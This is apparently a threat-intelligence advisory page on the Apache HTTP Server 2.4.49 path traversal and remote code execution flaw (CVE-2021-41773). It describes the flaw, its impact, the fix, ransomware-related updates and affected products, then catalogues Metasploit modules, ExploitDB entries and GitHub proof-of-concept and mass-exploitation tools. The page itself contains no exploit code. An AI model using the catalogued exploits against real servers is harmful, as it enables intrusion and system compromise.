CVE-2021-41773
Overview
This vulnerability is a path traversal flaw in the path normalization logic of Apache HTTP Server version 2.4.49. The root cause lies in improper sanitization of URL-encoded sequences within Alias-like directive paths, allowing crafted requests to bypass directory restrictions. The affected component is the URL path normalization mechanism responsible for resolving aliased resource locations.
Vulnerability Description
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
Impact
An unauthenticated attacker can exploit this vulnerability to access sensitive files outside the intended directories, potentially leaking system files like /etc/passwd. If CGI scripts are enabled in the aliased paths, the attacker can execute arbitrary commands remotely, resulting in full system compromise. No user interaction or authentication is required, enabling direct exploitation over the network. This can lead to data breaches, unauthorized system control, and disruption of services.
Solution
Upgrade Apache HTTP Server to version 2.4.51 or later, as versions 2.4.49 and 2.4.50 contain incomplete fixes. Refer to the official Apache security advisory at https://httpd.apache.org/security/vulnerabilities_24.html for detailed patch instructions. Fedora and Gentoo have issued security advisories with updated package versions addressing this flaw. Implement vendor-recommended updates promptly to remediate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical flaw in the path normalization process of Apache HTTP Server version 2.4.49 has raised significant security concerns. This vulnerability allows an attacker to perform path traversal attacks, which can map URLs to files located outside the intended directories defined by Alias-like directives. The issue arises when the default security configuration, which typically denies access to unauthorized files, is not enforced. Consequently, if an attacker can manipulate the URL to reference files outside the designated directories, they may gain unauthorized access to sensitive data or execute malicious scripts, particularly if CGI scripts are enabled for those paths.
The attack vectors associated with this vulnerability are particularly concerning due to their simplicity and effectiveness. An attacker can craft a malicious URL that exploits the path traversal flaw, potentially leading to the retrieval of sensitive files or the execution of arbitrary code on the server. For instance, if a web application is improperly configured, an attacker could access configuration files, user data, or even system files that should remain protected. The risk escalates when CGI scripts are enabled, as this could allow for remote code execution, giving the attacker full control over the affected server. The fact that this vulnerability has been observed in active exploitation amplifies the urgency for organizations to address it.
The real-world impact of this vulnerability is profound, particularly for businesses relying on the affected versions of the Apache HTTP Server. The potential for unauthorized access to sensitive information can lead to data breaches, loss of customer trust, and significant financial repercussions. Organizations may face regulatory penalties if they fail to protect personal data adequately. Furthermore, the ability for attackers to execute code remotely can result in complete system compromise, leading to service outages and extensive recovery costs. The implications extend beyond immediate financial loss; reputational damage can have long-lasting effects on a business's viability and customer relationships.
To detect and mitigate this vulnerability, organizations must take a proactive approach. Regularly auditing server configurations and ensuring that security best practices are followed is essential. This includes enforcing the default "require all denied" configuration for directories and ensuring that only necessary files are accessible via the web server. Organizations should also upgrade to the latest version of the Apache HTTP Server, as subsequent releases have addressed this vulnerability. Implementing web application firewalls (WAFs) can provide an additional layer of security by filtering out malicious requests before they reach the server. Continuous monitoring for unusual access patterns and employing intrusion detection systems can further enhance an organization's ability to respond to potential exploitation attempts.
In conclusion, the vulnerability in Apache HTTP Server 2.4.49 represents a significant threat to the security of web applications and the data they handle. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate action from affected organizations. By understanding the technical details, recognizing the attack vectors, and implementing robust detection and mitigation strategies, businesses can safeguard their systems against this and similar vulnerabilities, thereby maintaining the integrity and confidentiality of their data.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-41773, accompanied by the emergence of multiple new proof-of-concept exploits circulating within attacker communities. This expansion of available tooling lowers the barrier for adversaries to conduct path traversal and remote code execution attacks against vulnerable Apache HTTP Server instances. Although the CVSS score was revised downward to 7.5, reflecting a more precise assessment of the vulnerability’s impact, the increased exploitation activity and the confirmed use of this flaw in ransomware campaigns linked to Iranian IRGC Data Extortion Operations underscore a sustained and evolving threat. Our telemetry indicates that while the overall exploit trend remains stable, the qualitative shift toward more frequent and diverse attack vectors amplifies the operational risk for defenders. Consequently, organizations should regard this vulnerability as a persistent high-risk concern due to its active exploitation and association with financially motivated threat actors.
Update 2 — May 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2021-41773, accompanied by the emergence of new, more sophisticated proof-of-concept exploits that consolidate previous fragmented attack methods. This evolution in the exploit landscape signals an increased operational capability among threat actors, including those linked to Iranian IRGC Data Extortion Operations, who continue to leverage this vulnerability within ransomware campaigns. Our telemetry further indicates a subtle upward trend in attack frequency, underscoring persistent adversary interest despite prior mitigation efforts. The convergence of enhanced exploit tools and ongoing ransomware utilization elevates the threat profile of CVE-2021-41773, reinforcing its status as a critical risk vector for organizations running vulnerable Apache HTTP Server versions. Consequently, defenders should anticipate sustained and potentially more complex exploitation attempts, reflecting a heightened and evolving threat environment.
Update 3 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-41773, accompanied by the emergence of several new proof-of-concept tools that lower the barrier for adversaries to conduct path traversal and remote code execution attacks against vulnerable Apache HTTP Server instances. This uptick in activity correlates with a near-maximal EPSS score, indicating a heightened likelihood of exploitation in the wild. The expanding exploit landscape, combined with ongoing associations to Iranian IRGC-linked ransomware operations, underscores an evolving threat environment where adversaries are refining their capabilities and persistence mechanisms. For defenders, this signals an increased risk of sophisticated intrusion attempts leveraging this vulnerability, necessitating heightened vigilance despite prior mitigation efforts. Consequently, the overall threat level for CVE-2021-41773 should be considered elevated, reflecting both the growing exploitation momentum and the sustained interest from ransomware-affiliated threat actors.
Update 4 — July 10, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2021-41773, evidenced by a notable surge in detection telemetry and the emergence of multiple new proof-of-concept exploits on public platforms. This increased adversary interest coincides with an upward revision of the CVSS score to critical severity, reflecting a deeper understanding of the vulnerability’s potential impact, particularly its facilitation of remote code execution when combined with misconfigured CGI scripts. The persistence of ransomware groups linked to Iranian IRGC data extortion operations exploiting this flaw further amplifies the threat landscape, indicating that attackers are actively integrating this vulnerability into their operational toolkits. For defenders, this evolution signifies a heightened risk of sophisticated intrusion attempts leveraging both path traversal and remote code execution vectors. Consequently, the overall threat level associated with CVE-2021-41773 has escalated, underscoring the urgency for continuous monitoring and adaptive defensive postures.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apache | Http Server | 2.4.49 |
cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 35 |
cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | 17.1 |
cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | 17.2 |
cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | 17.3 |
cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*
|
|
|
Netapp | Cloud Backup | N/A |
cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Apache 2.4.49/2.4.50 Traversal RCE scanner
auxiliary/scanner/http/apache_normalize_path
|
Ash Daulton, Dhiraj Mishra, mekhalleh (RAMELLA Sébastien) | Unknown | - | View |
|
Apache 2.4.49/2.4.50 Traversal RCE
exploits/multi/http/apache_normalize_path_rce
|
Ash Daulton, Dhiraj Mishra, mekhalleh (RAMELLA Sébastien) | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) | Valentin Lobstein | webapps | multiple | - | View |
| Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | Lucas Souza | webapps | multiple | - | View |
GitHub PoCs (154)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
blasty/CVE-2021-41773
CVE-2021-41773 playground
|
blasty | 211 | 48 | 2021-10-06 | View |
|
inbug-team/CVE-2021-41773_CVE-2021-42013
CVE-2021-41773 CVE-2021-42013漏洞批量检测工具
|
inbug-team | 147 | 46 | 2021-10-09 | View |
|
iilegacyyii/PoC-CVE-2021-41773
|
iilegacyyii | 52 | 37 | 2021-10-05 | View |
|
HightechSec/scarce-apache2
A framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public
|
HightechSec | 63 | 18 | 2021-10-07 | View |
|
MrCl0wnLab/SimplesApachePathTraversal
Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
|
MrCl0wnLab | 62 | 15 | 2021-10-13 | View |
|
lorddemon/CVE-2021-41773-PoC
|
lorddemon | 39 | 22 | 2021-10-05 | View |
|
justakazh/mass_cve-2021-41773
MASS CVE-2021-41773
|
justakazh | 29 | 19 | 2021-10-07 | View |
|
Vulnmachines/cve-2021-41773
CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.
|
Vulnmachines | 38 | 9 | 2021-10-05 | View |
|
BlueTeamSteve/CVE-2021-41773
Vulnerable docker images for CVE-2021-41773
|
BlueTeamSteve | 23 | 8 | 2021-10-06 | View |
|
im-hanzou/apachrot
Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker
|
im-hanzou | 22 | 6 | 2021-10-09 | View |
|
ZephrFish/CVE-2021-41773-PoC
|
ZephrFish | 17 | 11 | 2021-10-05 | View |
|
Ls4ss/CVE-2021-41773_CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
|
Ls4ss | 20 | 7 | 2021-10-06 | View |
|
j4k0m/CVE-2021-41773
Exploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49.
|
j4k0m | 13 | 7 | 2021-10-05 | View |
|
0xRar/CVE-2021-41773
Exploit for Apache 2.4.49
|
0xRar | 7 | 12 | 2021-10-08 | View |
|
itsecurityco/CVE-2021-41773
CVE-2021-41773 POC with Docker
|
itsecurityco | 12 | 6 | 2021-10-06 | View |
|
zeronine9/CVE-2021-41773
Fast python tool to test apache path traversal CVE-2021-41773 in a List of url
|
zeronine9 | 11 | 7 | 2021-10-08 | View |
|
knqyf263/CVE-2021-41773
Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)
|
knqyf263 | 9 | 7 | 2021-10-05 | View |
|
wangfly-me/Apache_Penetration_Tool
CVE-2021-41773&CVE-2021-42013图形化漏洞检测利用工具
|
wangfly-me | 14 | 0 | 2022-04-27 | View |
|
Zeop-CyberSec/apache_normalize_path
Metasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 and CVE-2021-42013 (Path Traversal in Apache 2...
|
Zeop-CyberSec | 12 | 2 | 2021-10-06 | View |
|
theLSA/apache-httpd-path-traversal-checker
apache httpd path traversal checker(CVE-2021-41773 / CVE-2021-42013)
|
theLSA | 9 | 5 | 2021-10-15 | View |
|
creadpag/CVE-2021-41773-POC
CVE-2021-41773
|
creadpag | 8 | 5 | 2021-10-06 | View |
|
CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit
CVE-2021-41773 | CVE-2021-42013 Exploit Tool (Apache/2.4.49-2.4.50)
|
CalfCrusher | 10 | 3 | 2022-04-04 | View |
|
blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution
Apache HTTP-Server 2.4.49-2.4.50 Path Traversal & Remote Code Execution PoC (CVE-2021-41773 & CVE-2021-42013)
|
blackn0te | 13 | 0 | 2022-11-22 | View |
|
1nhann/CVE-2021-41773
CVE-2021-41773 的复现
|
1nhann | 9 | 4 | 2021-10-06 | View |
|
numanturle/CVE-2021-41773
CVE-2021-41773
|
numanturle | 8 | 4 | 2021-10-05 | View |
|
mr-exo/CVE-2021-41773
Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50
|
mr-exo | 11 | 0 | 2021-10-26 | View |
|
aqiao-jashell/CVE-2021-41773
apache路径穿越漏洞poc&exp
|
aqiao-jashell | 9 | 1 | 2022-11-01 | View |
|
TishcaTpx/POC-CVE-2021-41773
Poc.py
|
TishcaTpx | 6 | 3 | 2021-10-05 | View |
|
apapedulimu/Apachuk
CVE-2021-41773 Grabber
|
apapedulimu | 4 | 4 | 2021-10-11 | View |
|
aqiao-jashell/py-CVE-2021-41773
python编写的apache路径穿越poc&exp
|
aqiao-jashell | 7 | 0 | 2022-11-01 | View |
|
noflowpls/CVE-2021-41773
CVE-2021-41773
|
noflowpls | 6 | 1 | 2021-10-07 | View |
|
Hydragyrum/CVE-2021-41773-Playground
Some docker images to play with CVE-2021-41773 and CVE-2021-42013
|
Hydragyrum | 6 | 1 | 2021-11-04 | View |
|
jbovet/CVE-2021-41773
Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
|
jbovet | 4 | 3 | 2021-10-06 | View |
|
twseptian/cve-2021-41773
CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited
|
twseptian | 4 | 3 | 2021-10-07 | View |
|
habibiefaried/CVE-2021-41773-PoC
PoC for CVE-2021-41773 with docker to demonstrate
|
habibiefaried | 3 | 4 | 2021-10-06 | View |
|
belajarqywok/CVE-2021-41773-MSF
Simple Metasploit-Framework module for conducting website penetration tests (CVE-2021-41773).
|
belajarqywok | 6 | 0 | 2023-08-11 | View |
|
LudovicPatho/CVE-2021-41773
The first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Serve...
|
LudovicPatho | 4 | 2 | 2021-10-15 | View |
|
OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits
Exploit CVE-2021-41773 and CVE-2021-42013
|
OfriOuzan | 4 | 1 | 2023-08-02 | View |
|
jheeree/Simple-CVE-2021-41773-checker
Simple script realizado en bash, para revisión de múltiples hosts para CVE-2021-41773 (Apache)
|
jheeree | 2 | 3 | 2021-10-06 | View |
|
walnutsecurity/cve-2021-41773
cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in ...
|
walnutsecurity | 2 | 3 | 2021-10-23 | View |
|
RevShellXD/LFI-Destruction
This program Prompts you for the Local File Inclusion information and will automatically search the /etc/passwd and usin...
|
RevShellXD | 4 | 0 | 2026-02-11 | View |
|
superzerosec/CVE-2021-41773
POC
|
superzerosec | 3 | 1 | 2021-10-08 | View |
|
Habib0x0/CVE-2021-41773
CVE-2021-41773 | Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks
|
Habib0x0 | 3 | 1 | 2022-06-07 | View |
|
orangmuda/CVE-2021-41773
Apache HTTPd (2.4.49) – Local File Disclosure (LFI)
|
orangmuda | 2 | 2 | 2021-10-07 | View |
|
5gstudent/cve-2021-41773-and-cve-2021-42013
cve-2021-41773 即 cve-2021-42013 批量检测脚本
|
5gstudent | 2 | 2 | 2021-10-09 | View |
|
wvverez/CVE-2021-41773-PoC
「🪶」PoC (Proof of concept) of Path traversal + RCE in Apache HTTP Server 2.4.49
|
wvverez | 2 | 1 | 2026-05-20 | View |
|
Chocapikk/CVE-2021-41773
|
Chocapikk | 2 | 1 | 2022-04-12 | View |
|
lopqto/CVE-2021-41773_Honeypot
Simple honeypot for CVE-2021-41773 vulnerability
|
lopqto | 2 | 1 | 2021-10-16 | View |
|
n3k00n3/CVE-2021-41773
exploit to CVE-2021-41773
|
n3k00n3 | 1 | 2 | 2021-10-06 | View |
|
corelight/CVE-2021-41773
A Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE...
|
corelight | 1 | 2 | 2021-10-08 | View |
|
pirenga/CVE-2021-41773
Ce programme permet de détecter une faille RCE sur les serveurs Apache 2.4.49 et Apache 2.4.50
|
pirenga | 0 | 3 | 2021-11-11 | View |
|
zerodaywolf/CVE-2021-41773_42013
Lab setup for CVE-2021-41773 (Apache httpd 2.4.49) and CVE-2021-42013 (Apache httpd 2.4.50).
|
zerodaywolf | 1 | 2 | 2021-10-18 | View |
|
Kouf320/docker-lab-cve-2017-5638-cve-2021-41773
|
Kouf320 | 2 | 0 | 2026-04-11 | View |
|
Kouf320/attacker-lab-cve-2017-5638-cve-2021-41773-paper
|
Kouf320 | 2 | 0 | 2026-04-11 | View |
|
Soliux/CVE-2021-41773
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so ...
|
Soliux | 2 | 0 | 2021-11-11 | View |
|
iosifache/ApacheRCEEssay
Essay (and PoCs) about CVE-2021-41773, a remote code execution vulnerability in Apache 2.4.49 🕸️
|
iosifache | 2 | 0 | 2022-05-12 | View |
|
Zyx2440/Apache-HTTP-Server-2.4.50-RCE
Apache-HTTP-Server-2.4.50-RCE This tool is designed to test Apache servers for the CVE-2021-41773 / CVE-2021-42013 vulne...
|
Zyx2440 | 2 | 0 | 2024-08-26 | View |
|
CyberQuestor-infosec/CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE
|
CyberQuestor-infosec | 2 | 0 | 2025-06-11 | View |
|
masahiro331/CVE-2021-41773
|
masahiro331 | 1 | 1 | 2021-10-05 | View |
|
PentesterGuruji/CVE-2021-41773
Path Traversal vulnerability in Apache 2.4.49
|
PentesterGuruji | 1 | 1 | 2021-10-06 | View |
|
r00tVen0m/CVE-2021-41773
|
r00tVen0m | 1 | 1 | 2021-10-06 | View |
|
AssassinUKG/CVE-2021-41773
Apache 2.4.49
|
AssassinUKG | 1 | 1 | 2021-10-06 | View |
|
vinhjaxt/CVE-2021-41773-exploit
CVE-2021-41773, poc, exploit
|
vinhjaxt | 1 | 1 | 2021-10-07 | View |
|
EagleTube/CVE-2021-41773
Apache 2.4.49 Path Traversal Vulnerability Checker
|
EagleTube | 1 | 1 | 2021-10-09 | View |
|
ranggaggngntt/CVE-2021-41773
|
ranggaggngntt | 0 | 2 | 2021-10-06 | View |
|
im2sinister/CVE-2021-41773
|
im2sinister | 1 | 0 | 2026-04-25 | View |
|
im2nerd/CVE-2021-41773
|
im2nerd | 1 | 0 | 2026-04-25 | View |
|
klmntbelgium/cve-2021-41773-exploration
Recreation and analysis of a curious logic error in Apache 2.4.49 that escalated to remote code execution
|
klmntbelgium | 1 | 0 | 2026-04-23 | View |
|
0xGabe/Apache-CVEs
Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)
|
0xGabe | 0 | 1 | 2023-06-03 | View |
|
mah4nzfr/CVE-2021-41773
Bash POC script for RCE vulnerability in Apache 2.4.49
|
mah4nzfr | 0 | 1 | 2025-08-11 | View |
|
MazX0p/CVE-2021-41773
|
MazX0p | 1 | 0 | 2021-10-25 | View |
|
shellreaper/CVE-2021-41773
This is a simple POC for Apache/2.4.49 Path Traversal Vulnerability
|
shellreaper | 1 | 0 | 2021-10-08 | View |
|
ksanchezcld/httpd-2.4.49
critical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-4...
|
ksanchezcld | 1 | 0 | 2021-10-12 | View |
|
IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit
This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2....
|
IcmpOff | 1 | 0 | 2021-11-09 | View |
|
kubota/POC-CVE-2021-41773
|
kubota | 1 | 0 | 2021-11-14 | View |
|
mightysai1997/CVE-2021-41773m
|
mightysai1997 | 1 | 0 | 2022-09-15 | View |
|
mightysai1997/CVE-2021-41773S
|
mightysai1997 | 1 | 0 | 2022-09-15 | View |
|
TheKernelPanic/exploit-apache2-cve-2021-41773
Exploit for path transversal vulnerability in apache
|
TheKernelPanic | 1 | 0 | 2022-12-05 | View |
|
retrymp3/apache2.4.49VulnerableLabSetup
CVE-2021-41773 vulnerable apache version 2.4.49 lab set-up.
|
retrymp3 | 1 | 0 | 2023-02-17 | View |
|
Iris288/CVE-2021-41773
|
Iris288 | 1 | 0 | 2023-11-20 | View |
|
psibot/apache-vulnerable
Detects Apache HTTP Server path traversal vulnerabilities (CVE-2021-41773, CVE-2021-42013) by checking for expos...
|
psibot | 1 | 0 | 2025-07-01 | View |
|
charanvoonna/CVE-2021-41773
|
charanvoonna | 1 | 0 | 2025-08-19 | View |
|
adrianmafandy/CVE-2021-41773
|
adrianmafandy | 1 | 0 | 2025-10-31 | View |
|
fnatalucci/CVE-2021-41773-RCE
|
fnatalucci | 0 | 1 | 2021-10-06 | View |
|
Hattan515/POC-CVE-2021-41773
|
Hattan515 | 0 | 1 | 2021-10-07 | View |
|
pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt
|
pisut4152 | 0 | 1 | 2021-10-08 | View |
|
b1tsec/CVE-2021-41773
A Python script to check if an Apache web server is vulnerable to CVE-2021-41773
|
b1tsec | 0 | 1 | 2021-10-08 | View |
|
BabyTeam1024/CVE-2021-41773
|
BabyTeam1024 | 0 | 1 | 2021-10-22 | View |
|
i6c/MASS_CVE-2021-41773
|
i6c | 0 | 1 | 2021-12-15 | View |
|
johnwickakash12/CVE-2021-41773
|
johnwickakash12 | 0 | 0 | 2026-07-09 | View |
|
Park123r/CVE-2021-41773
whs-homework
|
Park123r | 0 | 0 | 2026-07-07 | View |
|
Joapath/CVE-2021-41773
Prueba de concepto de CVE-2021-41773
|
Joapath | 0 | 0 | 2026-06-23 | View |
|
a24ac1/CVE-2021-41773-PoC
「🪶」PoC (Proof of concept) of Path traversal + RCE in Apache HTTP Server 2.4.49
|
a24ac1 | 0 | 0 | 2026-05-21 | View |
|
fxdyx-a/CVE-2021-41773-POC
Apache HTTP Server 2.4.49 Path Traversal Vulnerability Reproduction
|
fxdyx-a | 0 | 0 | 2026-06-14 | View |
|
JKIM72403/CS4277-CVE-Path-Traversal-Apache-HTTP-Server
We hope to reproduce CVE-2021-41773 to deepen our understanding of real-world cybersecurity vulnerabilities so that we c...
|
JKIM72403 | 0 | 0 | 2026-04-20 | View |
|
luongchivi/Preproduce-CVE-2021-41773
|
luongchivi | 0 | 0 | 2024-12-30 | View |
|
Taldrid1/cve-2021-41773
|
Taldrid1 | 0 | 0 | 2025-01-07 | View |
|
tiemio/SSH-key-and-RCE-PoC-for-CVE-2021-41773
This repository contains a Proof-of-Concept for the CVE-2021-41773. This CVE contains a LFI and RCE vulnerablity.
|
tiemio | 0 | 0 | 2025-02-02 | View |
|
Vanshuk-Bhagat/Apache-HTTP-Server-Vulnerabilities-CVE-2021-41773-and-CVE-2021-42013
In this project, I documented a detailed penetration testing process targeting Apache HTTP Server vulnerabilities, speci...
|
Vanshuk-Bhagat | 0 | 0 | 2025-03-11 | View |
|
ashique-thaha/CVE-2021-41773-POC
The POC and Lab setup documentation of CVE 2021 41773
|
ashique-thaha | 0 | 0 | 2025-03-20 | View |
|
khaidtraivch/CVE-2021-41773-Apache-2.4.49-
Kiểm thử xâm nhập
|
khaidtraivch | 0 | 0 | 2025-04-14 | View |
|
blu3ming/PoC-CVE-2021-41773
Python exploit for CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal vulnerability
|
blu3ming | 0 | 0 | 2025-07-02 | View |
|
zubairahm3d/apache-cve-2021-41773-lab
Vulnerable Docker lab and exploit for Apache HTTP Server 2.4.49 path traversal vulnerability (CVE‑2021‑41773)
|
zubairahm3d | 0 | 0 | 2026-03-16 | View |
|
tsiddiquea/cve-reproduction-lab
Cybersecurity lab demonstrating Apache CVE-2021-41773 path traversal vulnerability with vulnerable server simulation, sc...
|
tsiddiquea | 0 | 0 | 2026-03-18 | View |
|
sobanahmed6061/CVE-2021-41773-RedTeam
Apache 2.4.49 Path Traversal RCE
|
sobanahmed6061 | 0 | 0 | 2026-03-18 | View |
|
MatanelGordon/docker-cve-2021-41773
A little demonstration of cve-2021-41773 on httpd docker containers
|
MatanelGordon | 0 | 0 | 2023-04-20 | View |
|
mightysai1997/CVE-2021-41773.git1
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-
Mitigation/fix of CVE-2021-41773 A Path Traversal And File Disclosure Vulnerability In Apache
|
EkamSinghWalia | 0 | 0 | 2022-07-22 | View |
|
JIYUN02/cve-2021-41773
|
JIYUN02 | 0 | 0 | 2025-04-24 | View |
|
r0otk3r/CVE-2021-41773
|
r0otk3r | 0 | 0 | 2025-07-05 | View |
|
hackedrishi/CTF_WRITEUPS-TryHackMe-CVE-2021-41773-
CTF_WRITEUPS/TryHackMe /CVE-2021-41773/
|
hackedrishi | 0 | 0 | 2025-08-31 | View |
|
javaamo/CVE-2021-41773
CVE-2021-41773
|
javaamo | 0 | 0 | 2025-03-19 | View |
|
MuhammadHuzaifaAsif/security-lab
Documented CVE-2021-41773 (Apache HTTP Server path traversal, CVSS 9.8) — produced CVSS breakdown, impact assessment, an...
|
MuhammadHuzaifaAsif | 0 | 0 | 2025-09-14 | View |
|
faizdotid/CVE-2021-41773
Path Traversal Apache HTTP Server 2.4.49/2.4.50
|
faizdotid | 0 | 0 | 2025-11-26 | View |
|
Areeba-Zehra-Jafri/CVE-2021-41773---Apache-Path-Traversal---RCE
Proof-of-concept (PoC) for CVE-2021-41773, demonstrating Apache HTTP Server 2.4.49 path traversal and remote code execut...
|
Areeba-Zehra-Jafri | 0 | 0 | 2026-03-18 | View |
|
sudo0xksh/cve-2021-41773-checker
A simple Python proof-of-concept tool to check for Apache path traversal vulnerability (CVE-2021-41773). Detects vulner...
|
sudo0xksh | 0 | 0 | 2026-01-16 | View |
|
dserdyk3-arch/Serdyuk-DO-homework-CVE-2021-41773
PoC скрипт для CVE-2021-41773 - Path Traversal в Apache 2.4.49
|
dserdyk3-arch | 0 | 0 | 2026-02-07 | View |
|
Nanxsec/exploitApache
exploit para a CVE-2021-41773:Path Traversal cgi-bin
|
Nanxsec | 0 | 0 | 2026-03-15 | View |
|
0xc4t/CVE-2021-41773
POC & Lab For CVE-2021-41773
|
0xc4t | 0 | 0 | 2024-08-26 | View |
|
FakesiteSecurity/CVE-2021-41773
MASS CVE-2021-41773
|
FakesiteSecurity | 0 | 0 | 2025-01-03 | View |
|
AzkOsDev/CVE-2021-41773
|
AzkOsDev | 0 | 0 | 2025-05-28 | View |
|
jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773
Apache: a Mainstream Web Service Turned a Vector of Attack for Remote Code Execution
|
jkska23 | 0 | 0 | 2024-08-28 | View |
|
gunzf0x/CVE-2021-41773
Remote Code Execution PoC for Apache 2.4.49
|
gunzf0x | 0 | 0 | 2025-10-07 | View |
|
Mahfujurjust/CVE-2021-41773
|
Mahfujurjust | 0 | 0 | 2025-10-31 | View |
|
ChanaPCN/CVE-2021-41773-Analysis
Technical analysis and reproduction lab for the Apache HTTP Server 2.4.49 Path Traversal and RCE vulnerability.
|
ChanaPCN | 0 | 0 | 2026-01-12 | View |
|
abds059/APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-
A comprehensive analysis of CVE-2021-41773 (Apache HTTP Server 2.4.49), featuring vulnerability research, controlled lab...
|
abds059 | 0 | 0 | 2026-03-18 | View |
|
zer0qs/CVE-2021-41773
|
zer0qs | 0 | 0 | 2022-03-30 | View |
|
snapdowgg/CVE-2021-41773
CVE-2021-41773 <= Apache RCE Exploit
|
snapdowgg | 0 | 0 | 2026-03-22 | View |
|
TAI-REx/cve-2021-41773-nse
CVE-2021-41773.nse
|
TAI-REx | 0 | 0 | 2021-10-06 | View |
|
mohwahyudi/cve-2021-41773
|
mohwahyudi | 0 | 0 | 2021-10-06 | View |
|
sixpacksecurity/CVE-2021-41773
CVE-2021-41773 exploit PoC with Docker setup.
|
sixpacksecurity | 0 | 0 | 2021-10-07 | View |
|
shiomiyan/CVE-2021-41773
|
shiomiyan | 0 | 0 | 2021-10-07 | View |
|
ch4os443/CVE-2021-41773
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
|
ch4os443 | 0 | 0 | 2021-10-11 | View |
|
twseptian/cve-2021-41773-docker-lab
Docker container lab to play/learn with CVE-2021-41773
|
twseptian | 0 | 0 | 2021-10-14 | View |
|
LayarKacaSiber/CVE-2021-41773
|
LayarKacaSiber | 0 | 0 | 2021-10-20 | View |
|
TheLastVvV/CVE-2021-41773
Poc CVE-2021-41773 - Apache 2.4.49 with CGI enabled
|
TheLastVvV | 0 | 0 | 2021-10-23 | View |
|
vida003/Scanner-CVE-2021-41773
A automatic scanner to apache 2.4.49
|
vida003 | 0 | 0 | 2021-10-25 | View |
|
wolf1892/CVE-2021-41773
Setup vulnerable enviornment
|
wolf1892 | 0 | 0 | 2021-10-29 | View |
|
xMohamed0/CVE-2021-41773
|
xMohamed0 | 0 | 0 | 2021-11-14 | View |
|
skentagon/CVE-2021-41773
|
